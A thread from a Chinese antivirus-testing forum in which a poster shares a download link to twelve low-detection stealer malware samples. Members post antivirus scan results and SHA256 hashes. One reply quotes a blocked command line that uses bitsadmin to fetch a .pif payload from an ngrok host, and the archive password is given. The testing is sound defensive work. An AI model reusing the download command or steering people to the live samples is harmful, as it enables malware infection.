查看: 1111|回复: 12
收起左侧

[病毒样本] Stealer 12x(VT均低于14)

[复制链接]
Fadouse
发表于 2025-2-9 20:05:15 | 显示全部楼层 |阅读模式
本帖最后由 Fadouse 于 2025-2-9 20:40 编辑

https://www.123865.com/s/HmItjv-nvn2?提取码:lVim
详细的VT检出率, 文件SHA256 均在压缩包下的results文件夹中
心醉咖啡
发表于 2025-2-9 20:13:56 | 显示全部楼层
火绒2.8

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
hipoxiaxxx
发表于 2025-2-9 20:55:13 | 显示全部楼层
本帖最后由 hipoxiaxxx 于 2025-2-9 21:00 编辑

e235ca20ad4ef47f61cfe1ca2503a62639ca8b8e744921e819e351a3acfb5029 压缩包密码未知
FortiClient 扫描 2X

95f89677ac06e21b3fb760233e4a8caf5a49cad663bb9a4944a904dfa3debdab.exe - PossibleThreat.RF
25f719d585f09382477280b7e6fae7717bb9e33592ab709fbe32b7441d267d59.js - Malware_Generic.P0
anthonyqian
发表于 2025-2-9 22:12:58 | 显示全部楼层
VT检测率低不代表好样本,很多都是陈年老样本了,主流杀软迟迟不入库是有原因的
Fadouse
 楼主| 发表于 2025-2-9 22:30:17 | 显示全部楼层
本帖最后由 Fadouse 于 2025-2-9 22:31 编辑
anthonyqian 发表于 2025-2-9 22:12
VT检测率低不代表好样本,很多都是陈年老样本了,主流杀软迟迟不入库是有原因的

由于是代码自动收集,本包中确实在2018创建和部分低质量的样本,非常抱歉
但我能保证本包中全部样本的第一次提交MB/VT时间在这三个月内
且保证所有样本在joesandbox等众多沙箱中表现出恶意行为
早上起来不刷牙
发表于 2025-2-9 22:42:11 | 显示全部楼层
解压密码居然不是infected
Fadouse
 楼主| 发表于 2025-2-9 22:43:02 | 显示全部楼层
早上起来不刷牙 发表于 2025-2-9 22:42
解压密码居然不是infected

samples下的压缩包解码密码是infected
早上起来不刷牙
发表于 2025-2-9 22:46:30 | 显示全部楼层
Fadouse 发表于 2025-2-9 22:43
samples下的压缩包解码密码是infected

解压后还有五个不明压缩包

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Loyisa
发表于 2025-2-9 23:00:19 | 显示全部楼层
本帖最后由 Loyisa 于 2025-2-9 23:14 编辑

BD

1fef8663b000fcbf0db2f683fa360bc3db874f13577908a43c9ba5a28383d50f.msi 扫描+双击无动作
7e4b3d4db3c55072ba5daf5173748965734aa5f34ac09d95b751a1d65f8ed558 -> 压缩密码错误
25f719d585f09382477280b7e6fae7717bb9e33592ab709fbe32b7441d267d59.js Trojan.GenericKD.75824202
73b47149af8a048750833f65d3d95039f06d54fcd74f856bd1bce04dbb7ceb3c.exe 扫描+双击无动作83a3d826a340b78012613d5df41ceb49c61c3451370c0183fcdff60f3807f0f5 -> 密码错误95f89677ac06e21b3fb760233e4a8caf5a49cad663bb9a4944a904dfa3debdab.exe -> 在桌面生成了个info.txt后自退
416bfa52d8896acd2b8c62fa098e2299bb15435a7899f6bd6b66a73e9c18cae5.bat Trojan.GenericKD.75706910
3447e206c0db57c77033ffa0b18ace5bd8e31644a4bee7d6a23400243dc24479 -> 扫描+双击无动作
4436cc18ef65dd284e717474b86a3a00574f41c8adf41aa04b108c8324597947 -> 拦截mshta
d9cbee5015d5b13673cc5cbb6e8b0d3923d453f27b60bccf2a69e61010afa7aa -> 密码错误
e235ca20ad4ef47f61cfe1ca2503a62639ca8b8e744921e819e351a3acfb5029 Trojan.GenericKD.75465001
f40c1d241f0c053f957c7f54019b136b159f2a17ce3e170fc581749f2889e718.js
  1. 該應用程式 C:\Windows\System32\bitsadmin.exe 被傳遞了惡意命令列並已被封鎖。您的裝置現在安全無虞。
  2. 命令列:"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\konsolas\BITZX.pif
复制代码
biue
发表于 2025-2-9 23:17:28 | 显示全部楼层
腾讯电脑管家 不报
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-9 07:58 , Processed in 0.122637 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表